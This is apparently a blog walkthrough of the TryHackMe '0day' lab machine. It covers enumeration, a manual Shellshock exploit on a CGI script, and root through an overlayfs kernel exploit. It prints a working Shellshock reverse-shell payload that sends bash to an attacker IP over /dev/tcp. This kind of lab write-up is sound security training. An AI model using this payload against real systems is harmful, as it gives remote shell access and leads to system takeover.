0day Tryhackme Walkthrough
Exploit Ubuntu, like a Turtle in a Hurricane
0day is an intermediate boot2root machine on tryhackme and I found this machine to be very interesting to exploit.
This machine covers a very important vulnerability and one find it very easy to exploit.
Lets start off by scanning and enumerating the ports using Nmap.
Ok so we have got port 80 to be opened and we can further proceed with the web enumeration using dirb and nikto.
Lets see what we have got from the dirb using common.txt as the default wordlist.
We have got a lot of directories to go through.I got something very strange while going through backup directory.
I mean I got access to the ssh private key ,that’s huge but later when I tried getting into the machine using ssh ,it was a foul play : (
After some time the nikto scan results got completed and found this vulnerability in /cgi-bin/test.cgi.
So if you guys haven’t heard of what Shellshock is and how it works.Here’s a short explanation from my side.
Shellshock is a security bug which causes the bash to execute commands from environment variables unintentionally. If it is exploited it allows the attacker to remotely issue commands on the server, also called as Remote Code Execution.
Since the environmental variables are not sanitized properly by Bash before being executed,the attacker can pretty much takeover the entire system using Shellshock vuln.
It was discovered by Stephane Chazelas and was assigned with a CVE identifier CVE-2014–6271.We will move forward by exploiting it manually rather than using metasploit.
Exploiting Shellshock manually:
This is the basic method to see if the server is vulnerable to shellshock or not.Instead we will use our machine IP and path to vulnerability and see if we get anything from the server.
Ok so it is vulnerable and we can exploit it by injecting a reverse shell and listening for incoming connections.
curl –H ‘User-Agent: () { :;}; echo; echo; /bin/bash –i >& /dev/tcp/10.9.81.62/1234 0>&1 ’ bash –s : ‘’ http://10.10.226.13/cgi-bin/test.cgi
This is the payload that we will be using to get reverse connection.
We got user.txt and just left with the privilege escalation.
I searched around for a bit and did not get anything from it. So I fired up linpeas.sh and found there’s gcc compiler present in the machine.
Ok so lets check the version of Linux using uname and see if we can get any Kernel exploits.
We got it, overlayfs exploit :)
As you can see the gcc is not able to fetch cc1 and that’s the reason it is not getting compiled.Maybe its causing because of the PATH variable.
I did lookout for the hint on this room: “This is a very old operating system you’ve got here, isn’t it?..”
We have to change the PATH variable to get inline. Follow me…
export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin
Cool now just run the binary and enjoy root :))
There’s other method that I found out from the Tryhackme discord channel that we can compile the exploit in our machine and then transfer it to the victim’s machine. It works perfectly 😉
Hope to see you guys soon 😄 Happy Hacking 💻
